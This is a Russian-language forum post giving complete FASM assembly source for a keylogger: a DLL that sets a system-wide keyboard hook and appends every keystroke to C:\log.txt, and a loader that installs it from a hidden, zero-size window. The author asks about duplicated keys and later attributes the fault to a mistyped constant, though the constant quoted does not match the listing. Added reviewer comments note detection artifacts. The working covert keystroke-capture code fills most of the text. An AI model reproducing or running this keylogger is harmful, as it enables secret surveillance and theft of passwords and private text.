Здраствуйте. попробовал написать простой кейлоггер, который все нажатия клавиш записывает в C:\log.txt Если у вас есть свободное время - подскажите, пожалуйста, почему он каждую клавишу пишет два раза? вот исходник: libastral.dll: Код (Text):
; libastral.dll -- hook DLL. Exports InstallHook / UninstallHook / NKLogProc.
; Reviewer summary (defender's view): the DLL registers a WH_KEYBOARD hook with
; thread id 0 and its own module handle, and the hook procedure appends
; characters to the fixed path in LogFile. Artifacts visible in this listing
; that an analyst can look for: the file C:\log.txt, a module named
; libastral.dll, and an export table carrying a hook procedure (NKLogProc).
format PE GUI 4.0 DLL
entry KLogEntry
include '%fasminc%\win32a.inc'

section '.data' data readable writeable
  hInstance dd ?            ; module handle saved by KLogEntry on process attach
  NumWritten dd ?           ; bytes-written out-parameter for WriteFile; also passed (as 0) to ToAscii as the scan code
  hFile dd ?                ; handle returned by CreateFile for the log file
  chchch db ?               ; one-byte buffer holding the character that gets written
  LogFile db 'C:\log.txt',0 ; hard-coded output path
  CrLf db 0Dh,0Ah           ; CR LF pair written when VK_RETURN is seen
  _ks rb 256                ; buffer filled by GetKeyboardState
  w dd ?                    ; output buffer for ToAscii

; This section is flagged `shareable`, so hHook is a single copy shared by every
; process that maps the DLL rather than a per-process variable.
section '.bss' data readable writeable shareable
  hHook dd ?                ; hook handle returned by SetWindowsHookEx

section '.code' code readable writeable executable

; DLL entry point. On DLL_PROCESS_ATTACH it copies hInst into hInstance;
; every other reason falls straight through to ret.
proc KLogEntry hInst, reason, reserved1
  cmp [reason],DLL_PROCESS_ATTACH
  jne .finish
  push [hInst]
  pop [hInstance]
 .finish:
  ret
endp

; Installs the keyboard hook and stores the returned handle in hHook.
; The last argument (thread id) is 0 and the module argument is this DLL's
; handle, i.e. the hook is not limited to one thread of the calling process.
; A keyboard hook registered this way by an unsigned DLL is a common detection
; signal; image-load telemetry showing the same DLL in unrelated GUI processes
; is another. The return value is stored without being checked.
proc InstallHook
  invoke SetWindowsHookEx,WH_KEYBOARD,NKLogProc,[hInstance],0
  mov [hHook],eax
  ret
endp

; Removes the hook whose handle is stored in hHook.
proc UninstallHook
  invoke UnhookWindowsHookEx,[hHook]
  ret
endp

; WH_KEYBOARD hook procedure. nCode / wParam / lParam are the standard hook
; arguments: wParam is the virtual-key code, lParam the keystroke flags.
; Every path ends at .nologkey, which forwards the event with CallNextHookEx.
proc NKLogProc nCode, wParam, lParam
  ; NOTE(review): this literal has no `h` suffix, so the assembler reads it as
  ; decimal. The author's follow-up under the listings attributes the
  ; duplicated entries to a mistyped constant in this instruction
  ; (intended mask: 40000000h, bit 30 of lParam = previous key state).
  test [lParam],40000000
  jz .nologkey
  cmp [nCode],HC_ACTION
  jne .nologkey
  ; Filter: space and return are always accepted; otherwise only codes in the
  ; range 2Fh..100h (inclusive) reach .logkey.
  cmp word [wParam],VK_SPACE
  je .logkey
  cmp word [wParam],VK_RETURN
  je .logkey
  cmp [wParam],2Fh
  jb .nologkey
  cmp [wParam],100h
  jbe .logkey
  jmp .nologkey
 .logkey:
  ; Opens (or creates) the log with share mode 0 and seeks to the end. The
  ; handle is not checked before use. The file is opened, written and closed
  ; once per logged key, which shows up as a steady stream of tiny appends to
  ; one file in file-system monitoring.
  invoke CreateFile,LogFile,GENERIC_READ or GENERIC_WRITE,0,0,OPEN_ALWAYS,0,0
  mov [hFile],eax
  invoke SetFilePointer,[hFile],0,0,FILE_END
  cmp word [wParam],VK_RETURN
  jne .noenter
  invoke WriteFile,[hFile],CrLf,2,NumWritten,0
  jmp .finish
 .noenter:
  ; Translates the virtual key using the current keyboard state; the scan-code
  ; argument is [NumWritten], which was just zeroed. The ToAscii return value
  ; is ignored and only the low byte of w is written out.
  invoke GetKeyboardState,_ks
  mov [NumWritten],0
  invoke ToAscii,[wParam],[NumWritten],_ks,w,0
  mov al,byte [w]
  mov [chchch],al
  invoke WriteFile,[hFile],chchch,1,NumWritten,0
 .finish:
  invoke CloseHandle,[hFile]
 .nologkey:
  ; Pass the event on to the next hook in the chain.
  invoke CallNextHookEx,[hHook],[nCode],[wParam],[lParam]
  ret
endp

section '.idata' import data readable writeable
  library user32,'user32.dll',\
          kernel32,'kernel32.dll'
  include '%fasminc%\api\user32.inc'
  include '%fasminc%\api\kernel32.inc'

; Export table: the two install/uninstall entry points plus the hook procedure.
section '.edata' export data readable writeable
  export 'libastral.dll',\
         InstallHook,'InstallHook',\
         UninstallHook,'UninstallHook',\
         NKLogProc,'NKLogProc'
; Relocation section -- final line of the libastral.dll listing.
section '.reloc' fixups data readable discardable
NKeyLogger.exe: Код (Text):
; NKeyLogger.exe -- loader for libastral.dll.
; Reviewer summary (defender's view): the program creates a window that is
; never shown, calls the DLL's InstallHook from WM_CREATE and UninstallHook
; from WM_DESTROY, and otherwise just runs a message loop. Artifacts visible in
; this listing: window class '##NK##', window title '$$NK$$', and a static
; import of libastral.dll (InstallHook, UninstallHook).
format PE GUI 4.0
entry start
include '%fasminc%\win32a.inc'

section '.data' data readable writeable
  LibName db 'libastral.dll',0   ; not referenced in the code shown here
  CFileName db 'C:\ntldr.zza',0  ; not referenced in the code shown here
  wc WNDCLASSEX
  ClassName db '##NK##',0        ; window class name, also used for the instance check
  AppName db '$$NK$$',0          ; window title, also used for the instance check
  hwnd dd ?
  msg MSG
  hTimer dd ?                    ; not referenced in the code shown here
  hFile dd ?                     ; not referenced in the code shown here
  hLib dd ?                      ; not referenced in the code shown here

section '.code' code readable writeable executable

; Entry point. If a window with this class and title already exists the
; process exits immediately (single-instance check); otherwise it registers
; the class, creates the window and pumps messages until GetMessage returns 0.
start:
  invoke FindWindow,ClassName,AppName
  test eax,eax
  jnz .klir
  invoke GetModuleHandle,0
  mov [wc.hInstance],eax
  mov [wc.cbSize],sizeof.WNDCLASSEX
  mov [wc.style],CS_HREDRAW or CS_VREDRAW
  mov [wc.lpfnWndProc],WndProc
  mov [wc.cbClsExtra],0
  mov [wc.cbWndExtra],0
  mov [wc.hbrBackground],COLOR_WINDOW+1
  mov [wc.lpszClassName],ClassName
  mov [wc.lpszMenuName],0
  invoke LoadIcon,0,IDI_APPLICATION
  mov [wc.hIcon],eax
  mov [wc.hIconSm],eax
  invoke LoadCursor,0,IDC_ARROW
  mov [wc.hCursor],eax
  invoke RegisterClassEx,wc
  ; Style 0, position 0,0 and size 0x0, followed by SW_HIDE: the window exists
  ; only to receive WM_CREATE / WM_DESTROY and is never visible. A top-level
  ; window that is never shown can still be found by enumerating windows by
  ; class name or title.
  invoke CreateWindowEx,0,ClassName,AppName,0,0,0,0,0,0,0,[wc.hInstance],0
  mov [hwnd],eax
  invoke ShowWindow,eax,SW_HIDE
  invoke UpdateWindow,[hwnd]
 @@:
  ; Standard message loop; leaves when GetMessage returns 0.
  invoke GetMessage,msg,0,0,0
  test eax,eax
  jz @f
  invoke TranslateMessage,msg
  invoke DispatchMessage,msg
  jmp @b
 @@:
  mov eax,[msg.wParam]
 .klir:
  ; Exit code is the constant 0; the value loaded into eax above is not used.
  invoke ExitProcess,0

; Window procedure. WM_CREATE installs the hook, WM_DESTROY removes it and
; posts the quit message; both return 0. All other messages go to
; DefWindowProc and its result is returned unchanged.
proc WndProc hWnd, uMsg, wParam, lParam
  cmp [uMsg],WM_CREATE
  je .wmcreate
  cmp [uMsg],WM_DESTROY
  je .wmdestroy
  invoke DefWindowProc,[hWnd],[uMsg],[wParam],[lParam]
  ret
 .wmcreate:
  call [InstallHook]
  jmp .finish
 .wmdestroy:
  call [UninstallHook]
  invoke PostQuitMessage,0
  jmp .finish
 .finish:
  xor eax,eax
  ret
endp

; libastral.dll is bound through the import table, so the loader maps it at
; process start.
section '.idata' import data readable writeable
  library user32,'user32.dll',\
          kernel32,'kernel32.dll',\
          libastral,'libastral.dll'
  include '%fasminc%\api\user32.inc'
  include '%fasminc%\api\kernel32.inc'
  import libastral,\
         InstallHook,'InstallHook',\
         UninstallHook,'UninstallHook'
Уже около 4 часов ищу ошибку... Наконец-то нашёл сам %). Я всего лишь вместо "test [lParam],40000000h" написал "test [lParam],4000000". Как же я ненавижу такие ошибки...